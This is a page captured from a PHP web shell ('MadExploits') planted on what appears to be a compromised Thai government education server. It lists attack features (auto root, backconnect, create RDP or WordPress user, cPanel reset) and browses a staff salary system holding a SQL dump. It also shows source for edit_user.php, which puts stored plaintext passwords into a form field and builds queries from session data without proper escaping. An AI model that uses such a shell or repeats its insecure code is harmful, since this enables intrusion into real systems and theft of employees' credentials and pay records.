Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
salary29 /
[ HOME SHELL ]
Name
Size
Permission
Action
Connections
[ DIR ]
drwxr-xr-x
_mmServerScripts
[ DIR ]
drwxr-xr-x
_notes
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
admin1
[ DIR ]
drwxr-xr-x
salary2020
[ DIR ]
drwxr-xr-x
salary2021
[ DIR ]
drwxr-xr-x
PHPCounter.txt
8
B
-rwxrwxrwx
apr64.php
11.58
KB
-rw-r--r--
apr65.php
11.58
KB
-rw-r--r--
apr66.php
11.58
KB
-rw-r--r--
apr67.php
11.59
KB
-rw-r--r--
apr68.php
11.59
KB
-rw-r--r--
aug64.php
11.58
KB
-rw-r--r--
aug65.php
11.58
KB
-rw-r--r--
aug66.php
11.58
KB
-rw-r--r--
aug67.php
11.59
KB
-rw-r--r--
aug68.php
11.59
KB
-rw-r--r--
dec63.php
11.4
KB
-rw-r--r--
december64.php
11.59
KB
-rw-r--r--
december65.php
11.59
KB
-rw-r--r--
december66.php
11.59
KB
-rw-r--r--
december67.php
11.6
KB
-rw-r--r--
edit_ok.php
1.33
KB
-rw-r--r--
edit_user.php
6.73
KB
-rw-r--r--
feb64.php
11.41
KB
-rw-r--r--
feb65.php
11.59
KB
-rw-r--r--
feb66.php
11.59
KB
-rw-r--r--
feb67.php
11.59
KB
-rw-r--r--
feb68.php
11.6
KB
-rw-r--r--
index.php
5.9
KB
-rw-r--r--
jan64.php
11.39
KB
-rw-r--r--
jan65.php
11.58
KB
-rw-r--r--
jan66.php
11.58
KB
-rw-r--r--
jan67.php
11.58
KB
-rw-r--r--
jan68.php
11.59
KB
-rw-r--r--
jul64.php
11.58
KB
-rw-r--r--
jul65.php
11.58
KB
-rw-r--r--
jul66.php
11.58
KB
-rw-r--r--
jul67.php
11.59
KB
-rw-r--r--
jul68.php
11.59
KB
-rw-r--r--
jun64.php
11.59
KB
-rw-r--r--
jun65.php
11.59
KB
-rw-r--r--
jun66.php
11.59
KB
-rw-r--r--
jun67.php
11.6
KB
-rw-r--r--
jun68.php
11.6
KB
-rw-r--r--
login_fail.php
1.35
KB
-rw-r--r--
logo2.png
229.12
KB
-rw-r--r--
main.php
17.8
KB
-rw-r--r--
main_.php
8.84
KB
-rw-r--r--
mar64.php
11.58
KB
-rw-r--r--
mar65.php
11.58
KB
-rw-r--r--
mar66.php
11.58
KB
-rw-r--r--
mar67.php
11.58
KB
-rw-r--r--
mar68.php
11.59
KB
-rw-r--r--
may64.php
11.58
KB
-rw-r--r--
may65.php
11.58
KB
-rw-r--r--
may66.php
11.58
KB
-rw-r--r--
may67.php
11.59
KB
-rw-r--r--
may68.php
11.59
KB
-rw-r--r--
nouser.php
6.72
KB
-rw-r--r--
nov63.php
11.4
KB
-rw-r--r--
nov64.php
11.59
KB
-rw-r--r--
nov65.php
11.59
KB
-rw-r--r--
nov66.php
11.59
KB
-rw-r--r--
nov67.php
11.6
KB
-rw-r--r--
oct63.php
11.39
KB
-rw-r--r--
oct64.php
11.58
KB
-rw-r--r--
oct65.php
11.58
KB
-rw-r--r--
oct66.php
11.58
KB
-rw-r--r--
oct67.php
11.59
KB
-rw-r--r--
sep64.php
11.58
KB
-rw-r--r--
sep65.php
11.58
KB
-rw-r--r--
sep66.php
11.58
KB
-rw-r--r--
sep67.php
11.59
KB
-rw-r--r--
slipmanaul.jpg
25.32
KB
-rw-r--r--
slipmanaul.pdf
367.72
KB
-rw-r--r--
spmsalary.sql
697.92
KB
-rw-r--r--
spt.jpg
22.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_user.php
<?php require_once('Connections/salary_online.php'); ?> <?php if (!isset($_SESSION)) { session_start(); } $MM_authorizedUsers = ""; $MM_donotCheckaccess = "false"; // *** Restrict Access To Page: Grant or deny access to this page function isAuthorized($strUsers, $strGroups, $UserName, $UserGroup) { // For security, start by assuming the visitor is NOT authorized. $isValid = False; // When a visitor has logged into this site, the Session variable MM_Username set equal to their username. // Therefore, we know that a user is NOT logged in if that Session variable is blank. if (!empty($UserName)) { // Besides being logged in, you may restrict access to only certain users based on an ID established when they login. // Parse the strings into arrays. $arrUsers = Explode(",", $strUsers); $arrGroups = Explode(",", $strGroups); if (in_array($UserName, $arrUsers)) { $isValid = true; } // Or, you may restrict access to only certain users based on their username. if (in_array($UserGroup, $arrGroups)) { $isValid = true; } if (($strUsers == "") && false) { $isValid = true; } } return $isValid; } $MM_restrictGoTo = "login_fail.php"; if (!((isset($_SESSION['MM_Username'])) && (isAuthorized("",$MM_authorizedUsers, $_SESSION['MM_Username'], $_SESSION['MM_UserGroup'])))) { $MM_qsChar = "?"; $MM_referrer = $_SERVER['PHP_SELF']; if (strpos($MM_restrictGoTo, "?")) $MM_qsChar = "&"; if (isset($QUERY_STRING) && strlen($QUERY_STRING) > 0) $MM_referrer .= "?" . $QUERY_STRING; $MM_restrictGoTo = $MM_restrictGoTo. $MM_qsChar . "accesscheck=" . urlencode($MM_referrer); header("Location: ". $MM_restrictGoTo); exit; } ?><?php function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") { $theValue = (!get_magic_quotes_gpc()) ? addslashes($theValue) : $theValue; switch ($theType) { case "text": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "long": case "int": $theValue = ($theValue != "") ? intval($theValue) : "NULL"; break; case "double": $theValue = ($theValue != "") ? "'" . doubleval($theValue) . "'" : "NULL"; break; case "date": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "defined": $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue; break; } return $theValue; } $editFormAction = $_SERVER['PHP_SELF']; if (isset($_SERVER['QUERY_STRING'])) { $editFormAction .= "?" . htmlentities($_SERVER['QUERY_STRING']); } if ((isset($_POST["MM_update"])) && ($_POST["MM_update"] == "form1")) { $updateSQL = sprintf("UPDATE member SET username=%s, password=%s, name=%s WHERE id=%s", GetSQLValueString($_POST['username'], "text"), GetSQLValueString($_POST['password'], "text"), GetSQLValueString($_POST['name'], "text"), GetSQLValueString($_POST['id'], "int")); mysql_select_db($database_salary_online, $salary_online); $Result1 = mysql_query($updateSQL, $salary_online) or die(mysql_error()); $updateGoTo = "edit_ok.php"; if (isset($_SERVER['QUERY_STRING'])) { $updateGoTo .= (strpos($updateGoTo, '?')) ? "&" : "?"; $updateGoTo .= $_SERVER['QUERY_STRING']; } header(sprintf("Location: %s", $updateGoTo)); } $colname_Recordset1 = "-1"; if (isset($_SESSION['MM_Username'])) { $colname_Recordset1 = (get_magic_quotes_gpc()) ? $_SESSION['MM_Username'] : addslashes($_SESSION['MM_Username']); } mysql_select_db($database_salary_online, $salary_online); $query_Recordset1 = sprintf("SELECT * FROM member WHERE username = '%s'", $colname_Recordset1); $Recordset1 = mysql_query($query_Recordset1, $salary_online) or die(mysql_error()); $row_Recordset1 = mysql_fetch_assoc($Recordset1); $totalRows_Recordset1 = mysql_num_rows($Recordset1); ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>ระบบแจ้งยอดเงินเดือน ออนไลน์ </title> </head> <body> <table width="100%" border="0"> <tr> <td align="center"><table width="70%" border="1"> <tr> <td align="center" bgcolor="#FF9900">ระบบแจ้งยอดเงินเดือน ออนไลน์ </td> </tr> <tr> <td align="center"><form action="<?php echo $editFormAction; ?>" id="form1" name="form1" method="POST"> <p><br /> แก้ไขรหัสผ่านคุณ <?php echo $row_Recordset1['name']; ?> <br /> </p> <table width="402" border="0"> <tr> <td colspan="2" align="center" bgcolor="#FF9900"><strong>รายการ</strong></td> </tr> <tr height="19"> <td height="19" align="right">รหัสผู้ใช้</td> <td align="left"><?php echo $row_Recordset1['username']; ?></td> </tr> <tr height="19"> <td height="19" align="right" bgcolor="#FFEED5">รหัสผ่าน</td> <td align="left" bgcolor="#FFEED5"><input name="password" type="text" id="password" value="<?php echo $row_Recordset1['password']; ?>" /></td> </tr> <tr height="19"> <td height="19" colspan="2" align="left"><label> <input name="id" type="hidden" id="id" value="<?php echo $row_Recordset1['id']; ?>" /> <input name="username" type="hidden" id="username" value="<?php echo $row_Recordset1['username']; ?>" /> <input name="name" type="hidden" id="name" value="<?php echo $row_Recordset1['name']; ?>" /> </label></td> </tr> </table> <p> <label> <input type="submit" name="Submit" value="Submit" /> </label> </p> <p><a href="main.php">กลับหน้าหลัก</a></p> <p> </p> <input type="hidden" name="MM_update" value="form1"> </form> </td> </tr> <tr> <td align="center" bgcolor="#FF9900">สำนักงานเขตพื้นที่การศึกษามัธยมศึกษาเขต 29 </td> </tr> </table></td> </tr> <tr> <td align="center"> </td> </tr> </table> </body> </html> <?php mysql_free_result($Recordset1); ?>
Close